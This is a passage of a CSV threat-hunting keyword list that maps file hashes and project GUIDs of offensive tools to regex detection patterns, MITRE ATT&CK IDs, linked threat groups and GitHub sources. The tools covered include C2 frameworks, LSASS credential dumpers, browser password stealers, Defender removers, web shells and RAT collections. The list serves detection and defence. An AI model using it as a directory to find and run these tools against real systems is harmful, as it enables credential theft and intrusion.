"*8464129299b636de1a2a86eb3b7a1f1cbd577f50eb5e3758a7ded72c5d497f15*",".{0,1000}8464129299b636de1a2a86eb3b7a1f1cbd577f50eb5e3758a7ded72c5d497f15.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30187" 
"*8464ed2d9649b14feb34c3289cf026bfab930e132d0876b3be5cc1a50cbfc966*",".{0,1000}8464ed2d9649b14feb34c3289cf026bfab930e132d0876b3be5cc1a50cbfc966.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30188" "*846994e23ac384d930d24bc63ad2094bf6565a7ece8a14858d256124a5bfa817*",".{0,1000}846994e23ac384d930d24bc63ad2094bf6565a7ece8a14858d256124a5bfa817.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","30189" "*846f9e23af79dc84df9d197037e933dbf6b2bf068d4406bc7b3289cf516f71c5*",".{0,1000}846f9e23af79dc84df9d197037e933dbf6b2bf068d4406bc7b3289cf516f71c5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30190" "*8478fe6c22a45230e79b057d13439a7ebc0e1a5054d14abbd3c8317add565a40*",".{0,1000}8478fe6c22a45230e79b057d13439a7ebc0e1a5054d14abbd3c8317add565a40.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","30191" 
"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*",".{0,1000}847D29FF\-8BBC\-4068\-8BE1\-D84B1089B3C0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","30192" "*847d58dd3d25b7bab471a9105a7e7eef60cafa788e4942f37e87ccf4c740da5f*",".{0,1000}847d58dd3d25b7bab471a9105a7e7eef60cafa788e4942f37e87ccf4c740da5f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30193" "*847ff5d91e3c34f2e446ee6f6e2c76c9aafc25c76b031c9f8f45193840571176*",".{0,1000}847ff5d91e3c34f2e446ee6f6e2c76c9aafc25c76b031c9f8f45193840571176.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30194" "*8484a8848d429d954636f8c6c170bdd73d96288325b902eb43c3403f0650b5e6*",".{0,1000}8484a8848d429d954636f8c6c170bdd73d96288325b902eb43c3403f0650b5e6.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","30195" "*8489A9CE-AB1A-4D8D-8824-D9E18B9945FE*",".{0,1000}8489A9CE\-AB1A\-4D8D\-8824\-D9E18B9945FE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","30196" "*848D3E89D46E285D5BCFA7FD13E805ABCB8BAE926F7F1B40092EA56F4A025CAA*",".{0,1000}848D3E89D46E285D5BCFA7FD13E805ABCB8BAE926F7F1B40092EA56F4A025CAA.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/anthonysecurity/redteam_toolkit/blob/master/References/PowerView-2.0-tricks.ps1","1","0","#filehash","https://vx-underground.org/Archive/Dispossessor%20Leaks","10","1","24","19","2018-08-23T11:18:21Z","2018-02-07T16:29:53Z","30197" "*8492e696c691cd0893990f2496f827632345c6c278f4503455e996ff30a8f185*",".{0,1000}8492e696c691cd0893990f2496f827632345c6c278f4503455e996ff30a8f185.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30198" 
"*8493D0F0-CA01-4C5A-A6E3-C0F427966ABD*",".{0,1000}8493D0F0\-CA01\-4C5A\-A6E3\-C0F427966ABD.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","30199" "*849e89c51512e60426cd9ec659040cb18bbb49a31d463510f176d550b207acad*",".{0,1000}849e89c51512e60426cd9ec659040cb18bbb49a31d463510f176d550b207acad.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30200" "*84A7E50E-B0F0-4B3D-98CD-F32CDB1EB8CA*",".{0,1000}84A7E50E\-B0F0\-4B3D\-98CD\-F32CDB1EB8CA.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#GUIDproject","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","30202" "*84af149e112b1d379f2c8cc7261bf8fda864e2f3f37f0523274383c7c403ca0a*",".{0,1000}84af149e112b1d379f2c8cc7261bf8fda864e2f3f37f0523274383c7c403ca0a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30203" "*84b362a32522fdce071c44b305d146d1e10fbc86641431914c4b4b20d00c8ac0*",".{0,1000}84b362a32522fdce071c44b305d146d1e10fbc86641431914c4b4b20d00c8ac0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30204" "*84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041*",".{0,1000}84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30205" "*84ba0c573d8037b6ffefaecf7aee506624382ade184e884e3c03dae8c1f33317*",".{0,1000}84ba0c573d8037b6ffefaecf7aee506624382ade184e884e3c03dae8c1f33317.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30208" 
"*84bd7dfacba7564afcbbbac2d2c63f9704769ef3b3bbca2259d3ab433b81dc62*",".{0,1000}84bd7dfacba7564afcbbbac2d2c63f9704769ef3b3bbca2259d3ab433b81dc62.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30210" "*84bdf678ec3e8af21eeb0451409cc4ae3aab9e8bd4b9299e98a29ba5375fdf6e*",".{0,1000}84bdf678ec3e8af21eeb0451409cc4ae3aab9e8bd4b9299e98a29ba5375fdf6e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30211" "*84cf9980dd242f2d2734d0bafada4a555d661615d41fda9184d6c029098e01a0*",".{0,1000}84cf9980dd242f2d2734d0bafada4a555d661615d41fda9184d6c029098e01a0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30213" "*84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7*",".{0,1000}84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30214" "*84d3264c0daaaed493505f366bac7e8504137bdfa73dc0618588081d544997bb*",".{0,1000}84d3264c0daaaed493505f366bac7e8504137bdfa73dc0618588081d544997bb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30215" "*84d6bf44ebad6338855d9e4abafaed229c778a645c18e1bd5a343bf930c75110*",".{0,1000}84d6bf44ebad6338855d9e4abafaed229c778a645c18e1bd5a343bf930c75110.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30216" "*84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9*",".{0,1000}84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - 
T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30217" "*84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9*",".{0,1000}84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","30218" "*84df4aaf2b050748e52b7e61ac93739d376929cb6d00e6d8cef3c6d61b71ae0f*",".{0,1000}84df4aaf2b050748e52b7e61ac93739d376929cb6d00e6d8cef3c6d61b71ae0f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30220" "*84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550*",".{0,1000}84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30221" 
"*84e209caa4eaae874620fbba2fb4a0ab9b859aa1e82eaf7d36791854b3d0e76a*",".{0,1000}84e209caa4eaae874620fbba2fb4a0ab9b859aa1e82eaf7d36791854b3d0e76a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30222" "*84e22340a39a400c26564246e013d12d3995322742ab253cef4e8a820b1194c3*",".{0,1000}84e22340a39a400c26564246e013d12d3995322742ab253cef4e8a820b1194c3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30223" "*84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e*",".{0,1000}84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30224" "*84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7*",".{0,1000}84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","30225" "*84f94c746a47d8bee6663a57051e15ce80f6847dc66733c31b1d793301814fcb*",".{0,1000}84f94c746a47d8bee6663a57051e15ce80f6847dc66733c31b1d793301814fcb.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","30227" "*84f9a0b27d27d5eeb6d0e9a5eaffb858feefa1f5d2f0e8af9a654165e37dcf21*",".{0,1000}84f9a0b27d27d5eeb6d0e9a5eaffb858feefa1f5d2f0e8af9a654165e37dcf21.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30228" "*84fc3746ff1c1b3bd069bc4f64bf5416b9151d980088cd902799d7997f5b3882*",".{0,1000}84fc3746ff1c1b3bd069bc4f64bf5416b9151d980088cd902799d7997f5b3882.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","30229" "*84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6*",".{0,1000}84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30230" "*850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b*",".{0,1000}850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30232" "*850e81d95da8437a509398bea9d751af6c69b97799b64042041c074bc34e6659*",".{0,1000}850e81d95da8437a509398bea9d751af6c69b97799b64042041c074bc34e6659.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30233" "*8513ab71b3152da522168db4795fdbff36d8d190501df81d3ff986cf0019cd0f*",".{0,1000}8513ab71b3152da522168db4795fdbff36d8d190501df81d3ff986cf0019cd0f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30234" "*851b95eb24e83b16404165f2cd2a9937b4b4ec9884bb60c0bce4297c8a67de35*",".{0,1000}851b95eb24e83b16404165f2cd2a9937b4b4ec9884bb60c0bce4297c8a67de35.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30236" "*851bcf2dc07341e9be142b3916041942e8341a3d74080f6abe2f374b13e5fb82*",".{0,1000}851bcf2dc07341e9be142b3916041942e8341a3d74080f6abe2f374b13e5fb82.{0,1000}","offensive_tool_keyword","Malware RAT collection","from 
Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30237" "*851eca4c1dcbc7dfddce7496284df95a1eb57c9d6cad75bd92cd2afdae8054e2*",".{0,1000}851eca4c1dcbc7dfddce7496284df95a1eb57c9d6cad75bd92cd2afdae8054e2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30239" "*85201dd09ccaae5169624efeb7770c78b118c05062e1b8e66eb8583b07ca08fd*",".{0,1000}85201dd09ccaae5169624efeb7770c78b118c05062e1b8e66eb8583b07ca08fd.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30240" "*85239f4abe215e87a147a6f63e8a281c2c3a687dcc45d430042c1e897de36696*",".{0,1000}85239f4abe215e87a147a6f63e8a281c2c3a687dcc45d430042c1e897de36696.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","30241" "*8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7*",".{0,1000}8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30242" "*8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d*",".{0,1000}8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30243" "*8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d*",".{0,1000}8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - 
